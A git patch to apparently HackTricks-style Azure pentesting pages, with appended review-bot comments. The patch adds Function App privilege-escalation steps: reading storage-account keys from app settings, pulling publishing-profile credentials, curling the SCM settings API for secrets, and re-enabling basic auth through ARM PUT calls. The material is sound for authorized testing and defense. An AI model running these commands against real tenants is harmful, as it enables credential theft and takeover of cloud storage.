From 909a3378c2abddd340d7874a7fb9301dbec79a63 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Sat, 21 Dec 2024 16:53:47 +0000 Subject: [PATCH] GITBOOK-737: No subject --- .../az-functions-app-privesc.md | 66 +++++++++++++++++++ .../az-services/az-function-apps.md | 35 ++++++++-- 2 files changed, 97 insertions(+), 4 deletions(-) diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md index d92381b4c..f1bbf477c 100644 --- a/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md +++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md 
@@ -73,6 +73,72 @@ az functionapp keys set --resource-group --key-name --key ``` {% endcode %} +### Microsoft.Web/sites/config/list/action + +This permission allows to get the environmental variables of a function. Inside these variables it might be possible to find the default env variables **`AzureWebJobsStorage`** or **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** which actually contains an **account key to access the blob storage of the function with FULL permissions**. + +{% code overflow="wrap" %} +```bash +az functionapp config appsettings list --name --resource-group +``` +{% endcode %} + + + +### `Microsoft.Web/sites/publishxml/action, (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write)` + +This permissions allows to list all the publishing profiles which basically contains **basic auth credentials**: + +```bash +# Gte creds +az functionapp deployment list-publishing-profiles \ + --name basicauthenabled \ + --resource-group Resource_Group_1 \ + --output json +``` + +* **Method SCM** + +Then, you can access with these **basic auth credentials to the SCM URL** of your function app and get the values of the env variables: + +```bash +# Get env variables values +curl -u ':' \ + https://.scm.azurewebsites.net/api/settings -v +``` + +_Note that the **SCM username** is usually the char "$" followed by the name of the app, so: `$`._ + +And these env variables contains the **AccountKey** of the storage account storing the data of the function app, allowing to control that storage account. 
+ + + +If you see that those credentials are **REDACTED**, it's because you **need to enable the SCM basic authentication option** and for that you need the second permission (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):` + +{% code overflow="wrap" %} +```bash +# Enable basic authentication for SCM +az rest --method PUT \ + --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \ + --body '{ + "properties": { + "allow": true + } + }' + +# Enable basic authentication for FTP +az rest --method PUT \ + --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \ + --body '{ + "properties": { + "allow": true + } + }' +``` +{% endcode %} + + + {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/pentesting-cloud/azure-security/az-services/az-function-apps.md b/pentesting-cloud/azure-security/az-services/az-function-apps.md index b428b5135..3059c030d 100644 --- a/pentesting-cloud/azure-security/az-services/az-function-apps.md +++ b/pentesting-cloud/azure-security/az-services/az-function-apps.md 
@@ -48,7 +48,17 @@ This is very interesting from an attackers perspective as **write access over th This is very interesting from an attackers perspective as it might be possible to **pivot to internal networks** from a vulnerable Lambda function exposed to the Internet. {% endhint %} -### **Function Apps support Managed Identities.** +### **Environment Variables** + +it's possible to configure environment variables inside an app. Moreover, by default the env variables **`AzureWebJobsStorage`** and **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** (among others) are created. These are specially interesting because they **contain the account key to control with FULL permissions the storage account containing the data of the application**. + +### **Function Sandbox** + +Inside the sandbox the source code is located in **`/home/site/wwwroot`** in the file **`function_app.py`** (if python is used) the user running the code is **`app`** (without sudo permissions). + + + +### **Managed Identities** Moreover Function App might have certain endpoints that require a certain level of authentication, such as "admin" or "anonymous".\ An attacker could try to access the **anonymous allowed endpoints** to bypass the restrictions and gain access to sensitive data or functionality. 
@@ -81,10 +91,27 @@ Example to access a function API endpoint using a key: ## Enumeration -```powershell -# Get only Function Apps -Get-AzFunctionApp +{% code overflow="wrap" %} +```bash +# List all the functions +az functionapp list + +# Get info of 1 funciton (although in the list you already get this info) +az functionapp show --name --resource-group + +# Get env variables (and privesc tot he sorage account) +az functionapp config appsettings list --name --resource-group + +# Check if a domain was assigned to a function app +az functionapp config hostname list --webapp-name --resource-group + +# Get SSL certificates +az functionapp config ssl list --resource-group + +# Get network restrictions +az functionapp config access-restriction show --name --resource-group ``` +{% endcode %} ## Privilege Escalation
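Review bot: in the first hunk (az-functions-app-privesc.md, "Microsoft.Web/sites/config/list/action"), the statement that `AzureWebJobsStorage` / `WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` "actually contains an account key ... with FULL permissions" needs a qualifier: the setting holds a full-access key only when it is a key-based connection string; apps configured with identity-based storage connections (the `AzureWebJobsStorage__accountName` style settings) expose no key there, so whether this escalates depends on how the app was deployed. Several commands in the hunk also lost their placeholder values (`--name --resource-group`, `curl -u ':'`, and the `subscriptions//resourceGroups//providers/Microsoft.Web/sites//` URI), so the reader cannot tell where the app name, resource group and subscription go; restore them as `<name>`, `<resource-group>`, `<subscription-id>` style placeholders (they were most likely stripped as HTML). Smaller points: "# Gte creds" should be "# Get creds"; "This permissions allows to list" should be "This permission allows listing"; "these env variables contains" should be "contain"; the SCM username sentence ends in a bare `$` and should read `$<app-name>`; the heading "### `Microsoft.Web/sites/publishxml/action, (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write)`" is the only permission heading wrapped in backticks and carries a stray comma, so match the plain style of "### Microsoft.Web/sites/config/list/action" above it; and in "(`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):`" the closing backtick sits after the parenthesis and colon. Since both `az rest --method PUT` calls are ARM writes to `basicPublishingCredentialsPolicies`, it is worth one sentence noting that this change is recorded in the subscription Activity Log, which is what a defender would key on.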
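Review bot: in the az-function-apps.md hunk at @@ -48, the new "Function Sandbox" paragraph is a run-on that joins two facts; split it into "the source code is located in `/home/site/wwwroot` (in `function_app.py` when Python is used)" and "the code runs as the `app` user, which has no sudo rights". It also silently assumes a Linux plan and the Python v2 programming model: on Windows the home path differs, and the v1 model keeps an `__init__.py` per function folder rather than a single `function_app.py`, so say which is meant. "it's possible to configure environment variables" should start with a capital letter, and "specially interesting" should be "especially interesting". Renaming "### **Function Apps support Managed Identities.**" to "### **Managed Identities**" is fine, but the paragraph left under it ("Moreover Function App might have certain endpoints that require a certain level of authentication...") is about endpoint auth levels, not managed identities, so it now sits under an unrelated heading; move it or give it its own heading. The "FULL permissions" claim in "Environment Variables" has the same caveat as in the privesc page: it holds only when the setting is a key-based connection string, not an identity-based connection.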
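Review bot: the hunk at @@ -81 deletes the PowerShell `Get-AzFunctionApp` block instead of adding the `az` CLI next to it, so readers using the Az PowerShell module lose their only enumeration command; keep the `powershell` fence and append the new `bash` fence after it. Typos in the new comments: "funciton" should be "function" and "tot he sorage" should be "to the storage". Every command again lacks its placeholder values (`--name --resource-group`, `--webapp-name --resource-group`), so add `<name>` / `<resource-group>` placeholders. Note that `az functionapp config hostname list` genuinely takes `--webapp-name` while the other commands take `--name`; a one-line comment saying so will stop a later contributor "fixing" it to `--name`.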